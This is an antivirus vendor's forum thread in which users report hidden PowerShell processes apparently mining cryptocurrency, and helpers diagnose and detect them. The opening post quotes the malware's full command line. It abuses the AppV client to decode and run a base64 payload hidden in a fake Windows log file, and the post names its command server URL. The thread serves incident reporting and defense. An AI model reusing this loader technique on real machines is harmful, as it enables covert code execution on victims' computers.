Two strange powershell processes (maybe coinminers?)

[Kevin999 3]

Yesterday, I found some strange internet traffic when I using Wireshark. Then, I use EIS "network connection" tool, found it was created by powershell (I didn't run any powershell). This issue reproduce today.

1. Conhost.exe and powershell.exe was running background, but I didn't run each of them.
2. Powershell connected to [2606:4700:3031::ac43:9c07]:80 (today the same as yesterday), conhost seems doesn't had any network activity.
3. I use Wireshark to capture packages. then use filter ipv6.addr==2606:4700:3031::ac43:9c07 , then I found it was using HTTP/1.1 with connect method. Please note the strange strings in X-User-Agent. By the way, TLS (TCP-443) and QUIC (UDP-443) was created when I used Sandboxed Firefox visit xttps://private-chatting.com/ and xttps://api.private-chatting.com/ (!!! BE CAREFUL to visit them !!!), these website is using Cloudflare to protect themselves.
4. I use ESET SysInspector to captured a snapshot.

I used nslookup to reslove:

C:\Users\Admin>nslookup 2606:4700:3031::ac43:9c07
DNS request timed out.
    timeout was 2 seconds.
服务器:  UnKnown
Address:  192.168.1.1

DNS request timed out.
    timeout was 2 seconds.
*** 请求 UnKnown 超时

C:\Users\Admin>nslookup api.private-chatting.com
DNS request timed out.
    timeout was 2 seconds.
服务器:  UnKnown
Address:  192.168.1.1

非权威应答:
名称:    api.private-chatting.com
Addresses:  2606:4700:3032::6815:38d6
          2606:4700:3031::ac43:9c07
          104.21.56.214

__Today__

1.  I find the command line parameter of one of the powershell.exe by taskmgr (it cost about 10% CPU):

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer  n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}

      2. Find C:\Windows\logs\system-logs.txt , find these strings

Snipped: The code was moved to the the attached file to squeeze the post.

 

Please note $EndPointURL = "hxxp://api.private-chatting.com/connect";

It's as same as the URL in pcapng file.

system-logs.txt Strange traffic_20220424.rar

system-logs.rar

Edited April 25, 2022 by Marcos
Script moved to an attached file

[Kevin999 3]

I also use ESET SysInspector to capture a snapshot, I can upload it if in need.

[Marcos 5,074]

A detection will be added: PowerShell/Agent.GZ trojan

[ca81 1]

hi i have the same process.

how remove it.

i try disable powershell ect... but nothing.

have lock ip in firewall same now new.

how can i do for remove pls ???

ty

 

execute nod32 but found nothing

2606:4700:3032::6815:38d6:80

 

[Marcos 5,074]

You should find out the PowerShell script that was executed. Most likely it's legitimate which is also why it wasn't detected and there's no reason to be concerned.

Please provide logs collected with ESET Log Collector for a check.

[itman 1,659]

47 minutes ago, ca81 said:

2606:4700:3032::6815:38d6:80

 

Notice the remote IPv6 address is the same as previously posted that was detected performing coinmining activity.

Also, it is not normal Win system behavior to see PowerShell running as a stand-alone task for an extended period of time.

Edited April 27, 2022 by itman

[itman 1,659]

In regard to the prior PowerShell code posted:

Attacker dropped the coinminer code file previously in highlighted Windows log file directory. Attacker is creating App_V process remotely using Sync-AppPublishingServer.

[Soul 0]

I am going through the exact same thing and if this is indeed malicious, what could be done to remove it? Could you possible give a solution please? thank you!

[Marcos 5,074]

3 minutes ago, Soul said:

I am going through the exact same thing and if this is indeed malicious, what could be done to remove it? Could you possible give a solution please? thank you!

Please provide logs collected with ESET Log Collector for a start.

[Soul 0]

It is exactly the same stuff above. Exact same ip addresses and the api.chatting thing. Exact same shell command that is causing powershell to run in the background. What Itman posted is the shell command being executed.

Edited April 28, 2022 by Soul

[Marcos 5,074]

C:\Windows\logs\system-logs.txt should be detected. Please scan it with ESET. If not detected, supply it to me please.

[Soul 0]

it was not detected

 

Edited April 28, 2022 by Soul

[Soul 0]

sorry im a little confused. Which log file should i be giving you. I scanned the system_log file with eset and it said it was fine.

[Marcos 5,074]

Let's start off by providing logs collected with ESET Log Collector.

[Soul 0]

yea i could do that. Also to add to this, I restarted my computer and ESET did block the script that was running but i want more of a permanent solution if thats possible. To fully remove whats even initiating that script to open to begin with

[Marcos 5,074]

23 minutes ago, Soul said:

yea i could do that. Also to add to this, I restarted my computer and ESET did block the script that was running but i want more of a permanent solution if thats possible. To fully remove whats even initiating that script to open to begin with

According to the logs provided you don't have ESET installed.

On the other hand, there's an install log from yesterday that reads:
(SERVER)     MSI (s) (80:C4) [22:51:31:369]: Product: ESET Security -- Installation completed successfully.
(SERVER)     MSI (s) (80:C4) [22:51:31:370]: Windows Installer installed the product. Product Name: ESET Security. Product Version: 15.1.12.0. Product Language: 1033. Manufacturer: ESET, spol. s r.o.. Installation success or error status: 0.

That said, it looks like ESET was uninstalled prior to collecting the logs.

[Soul 0]

I did but i removed because i wanted to see if the script it blocked was permanent or temp and i couldnt turn it off so i uninstalled it and the script executed.

[Soul 0]

I just installed ESET again and now running the log collector 

[Soul 0]

im unable to send its 200mb 

[Marcos 5,074]

You can upload it to a file sharing service, such as OneDrive, Dropbox, etc. and drop me a private message with a download link.

[itman 1,659]

7 hours ago, Marcos said:

This is an actual log. Did you send a correct file?

Assume the file containing the Base64 encrypted coinminer code could be dropped anywhere. The attacker could actually now be creating a diversion where he is dropping two files; one being a legit system-logs.txt log file.

Also assume that since the file dropping is occurring prior to PowerShell execution, the coinminer code is being altered to defeat signature detection.

Appears to me a reverse shell has been created which is the source of the above activity. The key to stopping this coinminer is to find the reverse shell and create a sig. for it. Most likely for the attacker IP address being dialed out to.

My advice is create an Eset HIPS ask rule to monitor PowerShell.exe startup. Make sure alerting and log level of warning are specified. Hopefully this will point to what is running the script. Not sure here if the HIPS will detect the remote execution of the script. This HIPS ask rule should not cause issues for home users who would not be deploying PowerShell scripts for anything.

Edited April 28, 2022 by itman

[itman 1,659]

I am also going to perform a "connecting of the dots" exercise here:

1. The PowerShell script is signed.

2. The IP addresses being used track to Cloudflare.

3. Incident reports to date are China, France, and the U.S..

4 The OP who started the thread stated a CPU usage spike of 10%; a low rate for coin miners.

5. PowerShell execution is not hidden in the least.

Putting it all together strongly points to a legit software install that is performing coin mining. Hell, even Norton AV is doing it currently: https://www.theverge.com/2022/1/7/22869528/norton-crypto-miner-security-software-reaction .

Edited April 28, 2022 by itman

[itman 1,659]

Another thing I noticed from the OP's screen shot of running tasks is that he has WMware installed. The PowerShell script is loading the AppVClient. Finally, WMware has recent postings of RCE vulnerabilities: https://www.vmware.com/security/advisories/VMSA-2022-0010.html .

One of these RCE vulnerabilites is currently being exploited: https://thehackernews.com/2022/04/iranian-hackers-exploiting-vmware-rce.html and PowerShell is part of the attack.

More details here:

Quote

Adversaries can use this attack to deploy ransomware or coin miners, as part of their initial access, lateral movement, or privilege escalation. Morphisec research observed attackers already exploiting this vulnerability to launch reverse HTTPS backdoors—mainly Cobalt Strike, Metasploit, or Core Impact beacons. With privileged access, these types of attacks may be able to bypass typical defenses including antivirus (AV) and endpoint detection and response (EDR). 

https://blog.morphisec.com/vmware-identity-manager-attack-backdoor .

Edited April 28, 2022 by itman

[Marcos 5,074]

The OP has just installed ESET and it detected a PowerShell malware:

Since then I haven't heard if the threat has been resolved or not.

[Kevin999 3]

1 hour ago, Marcos said:

The OP has just installed ESET and it detected a PowerShell malware:

Since then I haven't heard if the threat has been resolved or not.

The threat was detected at 25 14:42:11 and 26 06:24:28 (after system start), but it no longer detected after that.

Edited April 29, 2022 by Kevin999